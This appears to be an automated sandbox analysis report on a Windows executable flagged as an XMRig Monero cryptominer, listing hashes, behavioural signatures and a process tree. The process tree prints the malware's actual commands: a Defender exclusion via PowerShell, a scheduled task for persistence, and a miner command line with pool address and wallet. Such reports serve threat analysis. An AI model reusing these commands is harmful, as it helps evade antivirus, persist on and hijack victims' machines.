Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    62s
  • max time network
    134s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10-01-2023 15:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe

  • Size

    847KB

  • MD5

    9b6d69c17de2903f867f6fcf298bbe54

  • SHA1

    4f7f126dcc0bef3ac869f6cedb644dfac478f057

  • SHA256

    7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0

  • SHA512

    5abc5ae652cd49e63c0fc5d3108bd0ecd597f9b8da3bcfd273f280f2630b28f10164ccda2b23dd7bb392a7b0ef9149fce89580c5796ee8210dd2180895758a86

  • SSDEEP

    24576:7WSpSnFR9PZClGq6Y1aNd1AfuHc226mWp7XP:7WBJUGzFrpoWZX

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe
    "C:\Users\Admin\AppData\Local\Temp\7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4560
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "NLJZH" /tr "C:\ProgramData\googleApp\NLJZH.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4904
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "NLJZH" /tr "C:\ProgramData\googleApp\NLJZH.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1096
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:5068
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2492 -s 2952
      2⤵
      • Program crash
      PID:3168

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2492-130-0x0000000000FE0000-0x000000000111E000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2492-125-0x00007FFDE0B80000-0x00007FFDE0CCA000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2492-124-0x00007FFDDF0D0000-0x00007FFDDF0F7000-memory.dmp

    Filesize

    156KB

    Download

  • memory/2492-122-0x00007FFDE11C0000-0x00007FFDE125D000-memory.dmp

    Filesize

    628KB

    Download

  • memory/2492-126-0x00007FFDDDC90000-0x00007FFDDDCA1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2492-174-0x00007FFDD4E60000-0x00007FFDD4F2C000-memory.dmp

    Filesize

    816KB

    Download

  • memory/2492-128-0x00007FFDC5DF0000-0x00007FFDC67DC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2492-129-0x0000000000FE0000-0x000000000111E000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2492-121-0x00007FFDD8BE0000-0x00007FFDD8C7C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/2492-131-0x00000000009B0000-0x00000000009F1000-memory.dmp

    Filesize

    260KB

    Download

  • memory/2492-132-0x00007FFDD59C0000-0x00007FFDD5AEC000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2492-133-0x00007FFDDDAF0000-0x00007FFDDDB15000-memory.dmp

    Filesize

    148KB

    Download

  • memory/2492-186-0x00007FFDD38E0000-0x00007FFDD3A18000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2492-176-0x00007FFDDD270000-0x00007FFDDD2A7000-memory.dmp

    Filesize

    220KB

    Download

  • memory/2492-175-0x00007FFDE1150000-0x00007FFDE11BC000-memory.dmp

    Filesize

    432KB

    Download

  • memory/2492-170-0x0000000000FE0000-0x000000000111E000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2492-173-0x00007FFDD8A80000-0x00007FFDD8AA5000-memory.dmp

    Filesize

    148KB

    Download

  • memory/2492-123-0x00007FFDDF400000-0x00007FFDDF4AE000-memory.dmp

    Filesize

    696KB

    Download

  • memory/2492-127-0x00007FFDD8AE0000-0x00007FFDD8BD7000-memory.dmp

    Filesize

    988KB

    Download

  • memory/4560-142-0x000001B3F6260000-0x000001B3F62D6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4560-139-0x000001B3F60B0000-0x000001B3F60D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5068-177-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/5068-179-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/5068-185-0x0000024353570000-0x00000243535B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/5068-191-0x0000024354E50000-0x0000024354E70000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5068-180-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/5068-182-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/5068-187-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/5068-188-0x0000024353530000-0x0000024353550000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5068-189-0x0000024354E50000-0x0000024354E70000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5068-181-0x00000243534D0000-0x00000243534F0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5068-190-0x0000024353530000-0x0000024353550000-memory.dmp

    Filesize

    128KB

    Download